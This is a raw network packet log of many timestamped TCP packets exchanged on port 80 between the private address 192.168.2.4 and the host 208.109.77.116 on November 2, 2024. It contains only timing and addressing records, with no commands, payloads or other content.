                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308667898 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308680058 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308686972 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308701038 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308873892 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308885098 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308895111 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308906078 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308912039 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308933973 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308945894 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308962107 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308973074 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308984041 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308984995 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308995962 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309007883 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309009075 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309020996 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309031010 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309031963 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309056997 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309114933 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309130907 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309142113 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309154034 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309155941 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309165001 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309175968 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309180021 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309190989 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309205055 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309209108 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309222937 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309230089 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309232950 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309246063 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309256077 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309256077 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309267998 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309281111 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309282064 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309293985 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309302092 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309304953 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309312105 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309323072 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309329987 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309334040 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309345007 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309357882 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309376955 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309505939 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309545994 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309573889 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309585094 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309622049 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309808016 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309818029 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309828043 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309838057 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309849024 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309855938 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309859991 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309871912 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309874058 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309895992 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309956074 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309971094 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309983015 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.309992075 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310004950 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310010910 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310022116 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310033083 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310036898 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310043097 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310054064 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310055971 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310064077 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310075045 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310076952 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310092926 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310096979 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310103893 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310111046 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310112953 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310129881 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310141087 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310146093 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310156107 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310168028 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310169935 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310184002 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310193062 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310195923 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310205936 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310218096 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310225010 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310228109 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310239077 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310250044 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310251951 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310267925 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310272932 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310283899 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310291052 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310293913 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310305119 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310313940 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310321093 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310326099 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310334921 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310340881 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310348988 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310359955 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310370922 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310374022 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310381889 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310395002 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310399055 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310406923 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310406923 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310417891 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310430050 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310446024 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310452938 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310461998 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310472012 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310473919 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310484886 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310496092 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310511112 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310523987 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310553074 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310592890 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310597897 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310616970 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.310636044 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.348618984 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.348629951 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.348639011 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.348644018 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.348649979 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.348659039 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.348665953 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.348674059 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.348810911 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.348810911 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353593111 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353601933 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353645086 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353647947 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353678942 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353688955 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353699923 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353713989 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353729010 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353734016 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353739977 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353751898 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353761911 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353765011 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353775978 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353776932 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353787899 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353807926 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353811979 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353818893 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353840113 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353904009 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353914022 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353923082 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353931904 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353939056 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353943110 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353955030 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353956938 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353965998 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.353985071 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.354000092 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.354017973 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.354029894 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.354059935 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.401994944 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.402015924 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.402024984 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.402203083 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428522110 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428534985 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428544998 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428577900 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428584099 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428589106 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428606033 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428615093 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428617001 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428628922 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428641081 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428646088 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428670883 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428683043 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428688049 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428694010 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428704977 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428714991 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428726912 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428733110 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428740978 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428755999 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428771973 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428775072 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428782940 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428827047 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428832054 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428838968 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428848982 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428858995 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428874016 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428877115 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428888083 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428906918 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428914070 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428916931 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428927898 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428936958 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428961039 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428961039 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428971052 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.428982019 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.429004908 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.429030895 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.429222107 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.429255962 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.429265022 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.429281950 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.429292917 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.429302931 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.429306030 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.429336071 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.429342985 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.429344893 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.429395914 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.429425001 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.429434061 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.429474115 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.429477930 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.429487944 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.429497957 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.429523945 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.429836988 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.429886103 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.429912090 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.429920912 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.429938078 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.429948092 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.429958105 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.429960012 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.429999113 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430085897 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430130005 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430130959 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430143118 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430191994 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430201054 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430211067 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430221081 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430243015 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430288076 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430298090 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430308104 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430321932 CET8063806208.109.77.116192.168.2.4
